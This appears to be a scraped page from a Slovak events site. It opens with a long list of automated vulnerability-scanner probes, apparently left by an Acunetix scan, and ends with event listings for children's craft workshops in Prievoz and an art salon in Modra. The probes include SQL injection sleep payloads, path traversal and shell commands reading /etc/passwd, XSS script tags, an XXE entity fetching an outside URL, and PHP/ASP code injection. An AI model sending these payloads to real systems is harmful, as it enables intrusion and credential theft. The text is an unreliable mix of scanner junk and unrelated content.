1'; waitfor delay '0:0:4' --
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1<script>prompt(930547)</script>
../../../../../../../../../../etc/passwd.jpg
1"; waitfor delay '0:0:4' --
1<ScRiPt >prompt(955343)</ScRiPt>
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
JyI=
1' or (sleep(4)+1) limit 1 --
1
1" or (sleep(4)+1) limit 1 --
1
1'=sleep(4)='
1
1"=sleep(4)="
1
1;select pg_sleep(4); --
1<ScRiPt >prompt(919282)</ScRiPt>
1
1';select pg_sleep(4); --
\
<!--
1 or (sleep(4)+1) limit 1 --
|dir
1
1'"()&%<ScRiPt >prompt(922458)</ScRiPt>
1
1
1' and sleep(4)='
'|dir
1' and (sleep(4)+1) limit 1 --
1;994351
"|dir
1
@@uwwiE
1" and sleep(4)="
1
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>
1
";cat /etc/passwd;"
1
-1' or '105'='0
1
1
1
||cat /etc/passwd
1
-1" or "103"="103
&dir
1
1
1
-1" or "103"="0
1
'&dir&'
1'"
'"
1
1 and sleep(4)
1
"&dir&"
acunetix_wvs_invalid_filename
1
1
'|'ld
1
Array
bratislava-castle
1
-1 or 33=33
"|"ld
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
bratislava-castle
1
;cat /etc/passwd;
-1 or 33=0
1
1
bratislava-castle/.
1
';cat /etc/passwd;'
//www.acunetix.tst
-1' or '105'='105
1
"&cat /etc/passwd&"
1
1
";print(md5(acunetix_wvs_security_test));$a="
1
1e309
cat /etc/passwd
1
${@print(md5(acunetix_wvs_security_test))}
1
1
`cat /etc/passwd`
1
1
1
${@print(md5(acunetix_wvs_security_test))}\
1
|cat /etc/passwd#
'"\'\");|]*{ <>
1
1
1
1
1
http://testasp.vulnweb.com/t/fit.txt
1
1
268435455
1
1
1
1
1
1
1
1
&cat /etc/passwd&
1
1
1
;print(md5(acunetix_wvs_security_test));
..
'&cat /etc/passwd&'
1
1
';print(md5(acunetix_wvs_security_test));$a='
1
1
1
1
1
'"()
1
1
1
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
1
1
1
1
1
1
1
1
1
1
!(()&&!|*|*|
testasp.vulnweb.com
1
1
1
1
^(#$!@#$)(()))******
1
Array
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
1
1
1
1
1some_inexistent_file_with_long_name%00.jpg
1
1
1
1
http://testasp.vulnweb.com/t/fit.txt?%00.jpg
)
1
1
1
1
1
1
1
1
1
1
1&n927460=v947105
1
1
1
1
1
${100405+99720}
1
1
1
1
1
1
1
1
SomeCustomInjectedHeader:injected_by_wvs
SomeCustomInjectedHeader:injected_by_wvs
1
1
1
1
1
1
1
1
SomeCustomInjectedHeader:injected_by_wvs
1
1
1
1
response.write(9824706*9158170)
'+response.write(9824706*9158170)+'
"+response.write(9824706*9158170)+"
1
AKTUÁLNE UDALOSTI
7. SEP - 11. OKT

Prievozské tvorivé dielne

PRIEVOZSKÉ TVORIVÉ DIELNE A HRY PRE MALÝCH AJ VEĽKÝCH Obľúbené dielničky sú späť! Aj v mesiaci september a október si Mestská časť Bratislava-Ružinov a Cultus Ružinov pripravili pre malých aj veľkých už tradičné tvorivé dielne, na ktorých môžu popustiť uzdu svojej fantázii a kreativite. Tvorivé dielne budú prebiehať v Spoločenskom dome Prievoz, Kaštieľska 30 . VSTUP ZADARMOZÁZRAKY Z PAPIERA 07. september o 17:00Tvorivé popoludnie pre malých aj veľkých umelcov, ukážeme si, ako sa dá z recyklovaného papiera vykúzliť drobná hračka, či užitočná pomôcka na pracovný stôl a nájdeme odloženým veciam krásne nové využitie. Podujatie je zamerané na spoločné tvorenie rodičov a detí, náročnosť je prispôsobená vekovým kategóriám detí od 3-7r. a od 7-12r. a rovnako i hravým dospelým.JESEŇ V OKNE 21. september o 17:00 Jesenná príroda sama vyčaruje prekrásne prírodné výtvory, preto využijeme tvorivé popoludnie pre deti i dospelých a zhotovíme sioriginálnu jesennú ozdobu do okna z farebných listov, drievok a z iných pokladov, aby sme sa naučili vnímať krásu prírodných materiálov a jesennej farebnosti. Podujatie je zamerané na spoločné tvorenie rodičov a detí, náročnosť je prispôsobená vekovým kategóriám detí 3-7r. a 7-12r a rovnako i hravým dospelým.TEKVIČKOVÉ SLÁVNOSTI 11. október o 15:00Tradičné komunitné podujatie spojené s výstavou dopestovaných plodov prievozských a ružinovských záhradkárov,ukážkami kuchárskej šikovnosti pečenia a varenia z tekvíc,doplnená kultúrnym programom detí z folklórneho súboru Trávniček,spojené s tvorivými dielničkami pre deti aj rodičov - rôznymi technikami lepenia a zdobenia si vyrobíme svoju vlastnú tekvičku.STRAŠKOVIA A NETOPIERIKY 19. október o 17:00Tvorivé popoludnie pre malých aj veľkých, ktorí sa neboja práce s gázou, vrecovinou, s hodvábnym papierom, nožničkami a lepidlom,odmenou za šikovnosť a tvorivosť budú malí lietajúci kamaráti, ktorých sa netreba báť:-). Podujatie je zamerané na spoločné tvorenie rodičov a detí, náročnosť je prispôsobená vekovým kategóriám detí od 3-7r. a od 7-12r a rovnako i hravým dospelým.PLES STRAŠIDIELOK 9. november o 17:00Zábavné popoludnie v maskách, plné tanca, hier a tajomných úlohspojené s tvorivými dielničkami, podujatie je určené pre deti aj rodičov.Prihlásiť sa môžete na dana.plaskova@cultusruzinov.skKapacita obmedzená Vstup zadarmo
13. SEP - 10. JAN

Salón výtvarníkov

Salón výtvarníkov je kultúrno-umelecké podujatie, ktoré je tradične organizované Malokarpatským osvetovým strediskom (v zriaďovateľskej pôsobnosti Bratislavského samosprávneho kraja). Podujatie tento rok z verejných zdrojov podporil Fond na podporu umenia. Je pestrou prehliadkou tvorby výtvarníkov z Bratislavského kraja: Bratislavy, Pezinka, Modry, Stupavy, Malaciek, Senca, či z okolitých miest a mestečiek, ktorí tu žijú alebo tu tvoria  vo svojich ateliéroch. Na tomto podujatí sa prezentujú v rôznych výtvarných žánroch, technikách a námetoch. Práve pre túto svoju pestrosť je veľmi obľúbeným podujatím pre širokú škálu návštevníkov. Salón výtvarníkov sa aj tento rok koná v Zoya Museum – ELESKO wine park v Modre. Je to priestranný a moderný objekt, ktorého architektúra prenecháva dielam v galérii dostatočný priestor, aby mohli vyniknúť. Jeho lokalizácia priamo medzi vinicami spod Malých Karpát, dopĺňa kompozíciu umeleckých diel obrazmi namaľovanými prírodou, ktoré je vidieť cez presklené steny s výhľadom na okolitý kraj. Tento ročník je už 22. Na výstave sa uvidíte diela 78 výtvarníkov, čo je najviac za všetky doterajšie ročníky. Predstavia svoju aktuálnu tvorbu v podobe obrazov, sôch, plastík, šperkov, či fotografií. Každý rok sú pozvaní aj dvaja, či traja hostia, ktorí žijú a tvoria mimo tohto regiónu, či už na Slovensku alebo v zahraničí. Hosťami na Salóne výtvarníkov 2018, ktorí prijali pozvanie vystavovať spolu s našimi umelcami, sú poľský výtvarník Michal Franaszczuk a rakúsky fotograf Josef Mann. Kurátorom výstavy je Mgr. Pavol Šima–Juriček.Súčasťou prezentácie tvorby umelcov je aj prehľadný katalóg s krátkou anotáciou o každom výtvarníkovi, ktorý sa zúčastňuje na danom ročníku Salóna výtvarníkov. Výstava je pre verejnosť prístupná od 13. septembra 2018 až do konca roka.